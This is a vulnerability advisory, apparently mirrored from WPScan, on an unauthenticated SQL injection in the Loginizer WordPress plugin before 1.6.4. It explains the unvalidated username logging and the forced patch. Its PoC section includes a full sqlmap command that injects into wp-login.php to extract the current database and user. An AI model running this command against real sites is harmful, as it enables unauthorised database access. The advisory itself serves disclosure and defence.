Lucene search

K
wpvulndbWpvulndbWPVDB-ID:07683E3E-FFA7-452C-885F-31E8127ACF3B
HistoryOct 21, 2020 - 12:00 a.m.

Loginizer < 1.6.4 - Unauthenticated SQL Injection

2020-10-2100:00:00
wpscan.com
37

The Loginizer WordPress plugin was found to be affected by an Unauthenticated SQL Injection vulnerability found by the security researcher mslavco. The vulnerability was triggered within the brute force protection functionality, which was enabled by default when the plugin was first installed. When a user attempts to login with an unknown username, the attempt is logged in the backend database, where the username, as well as other parameters, are not properly validated before being placed within the SQL query. The patch for this issue also included other input sanitisation checks to prevent Cross-Site Scripting (XSS) vulnerabilities. WordPress issued a forced update to patch this vulnerability. According to the plugin author, this resulted in 89% of sites with the plugin being successfully patched.

PoC

From the original researcher: $ sqlmap.py -u http://local.target/wp-login.php --method=‘POST’ --data=‘log=&pwd;=password&wp-submit;=Log+In&redirect;_to=&testcookie;=1’ -p log --prefix=“', ip = LEFT(UUID(), 8), url = ( TRUE " --suffix=”) – wpdeeply" --dbms mysql --technique=T --time-sec=1 --current-db --current-user

CPENameOperatorVersion
loginizerlt1.6.4
Related for WPVDB-ID:07683E3E-FFA7-452C-885F-31E8127ACF3B